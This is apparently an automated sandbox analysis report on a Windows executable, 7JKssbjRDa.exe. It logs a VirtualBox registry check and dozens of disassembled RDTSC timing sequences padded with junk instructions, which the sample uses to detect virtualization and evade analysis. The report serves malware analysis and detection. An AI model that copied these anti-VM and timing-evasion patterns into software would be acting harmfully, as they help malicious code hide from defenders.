Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 81D440 second address: 81D45C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F68C0520B48h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9950B9 second address: 9950BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 99521B second address: 995230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F68C0520B4Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 99551C second address: 995528 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 995528 second address: 995532 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F68C0520B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9957EB second address: 995832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEDh 0x00000007 jmp 00007F68C0B5CAF5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F68C0B5CAF7h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 995832 second address: 995838 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 995838 second address: 99583D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 997291 second address: 997316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 492A6982h 0x0000000e mov edi, edx 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F68C0520B48h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D1E66h], edi 0x00000034 push 00000003h 0x00000036 mov ecx, dword ptr [ebp+122D2DFFh] 0x0000003c and ecx, 7A3EA8FEh 0x00000042 push 9BB52122h 0x00000047 jo 00007F68C0520B58h 0x0000004d pushad 0x0000004e jo 00007F68C0520B46h 0x00000054 jmp 00007F68C0520B4Ah 0x00000059 popad 0x0000005a xor dword ptr [esp], 5BB52122h 0x00000061 push ecx 0x00000062 and edi, dword ptr [ebp+122D2FA3h] 0x00000068 pop edx 0x00000069 lea ebx, dword ptr [ebp+1244E0A6h] 0x0000006f or dword ptr [ebp+122D2C3Bh], eax 0x00000075 xchg eax, ebx 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 997316 second address: 99731C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 99739A second address: 9973EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F68C0520B48h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 call 00007F68C0520B49h 0x00000019 jmp 00007F68C0520B58h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F68C0520B56h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9973EA second address: 9973F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9973F4 second address: 9973FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F68C0520B46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9973FF second address: 997414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F68C0B5CAE6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 997414 second address: 997418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 997418 second address: 99741E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 99741E second address: 9974CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F68C0520B46h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F68C0520B4Ah 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jnl 00007F68C0520B4Eh 0x0000001d push ecx 0x0000001e jnl 00007F68C0520B46h 0x00000024 pop ecx 0x00000025 pop eax 0x00000026 mov ecx, dword ptr [ebp+122D1E26h] 0x0000002c push 00000003h 0x0000002e mov esi, dword ptr [ebp+122D2F17h] 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D3142h], ecx 0x0000003c push 00000003h 0x0000003e mov ecx, esi 0x00000040 push ebx 0x00000041 jmp 00007F68C0520B50h 0x00000046 pop esi 0x00000047 push DB4607E0h 0x0000004c jmp 00007F68C0520B4Ah 0x00000051 xor dword ptr [esp], 1B4607E0h 0x00000058 or dword ptr [ebp+122D2B63h], ecx 0x0000005e lea ebx, dword ptr [ebp+1244E0AFh] 0x00000064 jmp 00007F68C0520B4Ah 0x00000069 mov esi, dword ptr [ebp+122D2ECFh] 0x0000006f xchg eax, ebx 0x00000070 jmp 00007F68C0520B55h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jng 00007F68C0520B4Ch 0x0000007e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9975F0 second address: 99767C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F68C0B5CAEDh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jns 00007F68C0B5CAEEh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F68C0B5CAEAh 0x00000024 pop eax 0x00000025 pushad 0x00000026 stc 0x00000027 mov dword ptr [ebp+122D2B63h], ebx 0x0000002d popad 0x0000002e push 00000003h 0x00000030 mov si, di 0x00000033 push 00000000h 0x00000035 sub dword ptr [ebp+122D1DF0h], ecx 0x0000003b push 00000003h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F68C0B5CAE8h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 sub dword ptr [ebp+122D18C2h], ebx 0x0000005d push DDA57666h 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jl 00007F68C0B5CAE6h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 99767C second address: 997693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 997693 second address: 997698 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 997698 second address: 9976D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 1DA57666h 0x0000000e call 00007F68C0520B4Ah 0x00000013 call 00007F68C0520B4Ch 0x00000018 sub dword ptr [ebp+122D2B47h], edi 0x0000001e pop ecx 0x0000001f pop ecx 0x00000020 lea ebx, dword ptr [ebp+1244E0BAh] 0x00000026 movzx ecx, bx 0x00000029 push eax 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8F90 second address: 9B8FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8FAF second address: 9B8FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97B9F4 second address: 97B9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97B9F8 second address: 97BA11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jp 00007F68C0520B46h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97BA11 second address: 97BA35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68C0B5CAF0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jno 00007F68C0B5CAE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97BA35 second address: 97BA50 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F68C0520B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F68C0520B4Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97BA50 second address: 97BA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B6CB9 second address: 9B6CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B6E56 second address: 9B6E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F68C0B5CAECh 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B78EA second address: 9B7923 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F68C0520B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F68C0520B58h 0x00000010 pop edi 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 jc 00007F68C0520B46h 0x0000001c popad 0x0000001d pushad 0x0000001e js 00007F68C0520B46h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B7B98 second address: 9B7B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B7B9C second address: 9B7BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B7E77 second address: 9B7E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B7E7D second address: 9B7E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B7E83 second address: 9B7E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B7E88 second address: 9B7E94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F68C0520B4Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B7E94 second address: 9B7E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8025 second address: 9B8029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8029 second address: 9B8044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F68C0B5CAEEh 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8044 second address: 9B807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F68C0520B52h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F68C0520B55h 0x00000015 jnp 00007F68C0520B46h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B807B second address: 9B8081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8081 second address: 9B8098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68C0520B50h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B866F second address: 9B8698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F68C0B5CAE8h 0x00000011 jmp 00007F68C0B5CAF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8698 second address: 9B86A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B86A9 second address: 9B86AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B86AF second address: 9B86B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8B17 second address: 9B8B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 je 00007F68C0B5CAE6h 0x0000000c popad 0x0000000d jmp 00007F68C0B5CAEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8B38 second address: 9B8B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8B3C second address: 9B8B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8B40 second address: 9B8B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9ADB4A second address: 9ADB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9ADB50 second address: 9ADB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9B8DFD second address: 9B8E03 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BBD6A second address: 9BBD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BBD70 second address: 9BBD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BBD76 second address: 9BBD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BBD7B second address: 9BBD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BBD80 second address: 9BBD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B50h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BDB04 second address: 9BDB0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BE11A second address: 9BE11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BE11E second address: 9BE14F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F68C0B5CAF6h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007F68C0B5CAECh 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BE14F second address: 9BE155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9BE155 second address: 9BE159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 988EA8 second address: 988EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 988EAC second address: 988EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C3DE7 second address: 9C3E0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F68C0520B46h 0x00000011 js 00007F68C0520B46h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C3E0A second address: 9C3E10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C3E10 second address: 9C3E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C3E16 second address: 9C3E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F68C0B5CAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C4149 second address: 9C4153 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F68C0520B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C5A9E second address: 9C5AA8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C5AA8 second address: 9C5ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0520B4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C5B3F second address: 9C5B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C5EE3 second address: 9C5EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C6715 second address: 9C6719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C67B7 second address: 9C67EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F68C0520B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F68C0520B48h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1D22h], eax 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C67EB second address: 9C67EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C67EF second address: 9C67F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C6CA6 second address: 9C6CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C6D2E second address: 9C6D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C6D34 second address: 9C6D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C7AE4 second address: 9C7AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C8C57 second address: 9C8C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
